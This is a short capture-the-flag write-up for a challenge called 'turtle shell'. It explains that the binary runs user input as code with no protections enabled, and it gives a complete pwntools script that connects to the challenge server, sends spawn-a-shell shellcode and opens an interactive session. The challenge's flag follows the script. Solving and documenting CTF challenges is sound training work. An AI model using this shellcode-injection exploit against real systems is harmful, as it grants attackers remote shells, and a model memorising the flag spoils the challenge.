turtle shell

simple shellcode

Problem

Description

A turtle without it's shell is a sad sight to see

Connect via: nc turtle.sdc.tf 1337

Solution

Its a simple and straight forward shellcode injection, it can be implied from the name and the fact that none of the protection is enabled.

The program simply takes our input and runs it as code, we can use pwntools's shellcraft to spawn a shell

decompiled main
Solve.py
#!user/bin/python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './turtle-shell'
context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'

local = False
if(local):
    io = process(exe)
else:
    io = remote('turtle.sdc.tf', 1337)

# =========================================================
#                         ADDRESSES
# =========================================================


# =========================================================
#                         EXPLOITS
# =========================================================

shellcode = asm(shellcraft.sh())

# flattening  payload here
payload = flat([
    shellcode,
])

io.sendline(payload)

io.interactive()

Flag

sdctf{w0w_y0u_m4d3_7h3_7urT13_c0m3_0u7_0f_1t5_5h3l1}

Last updated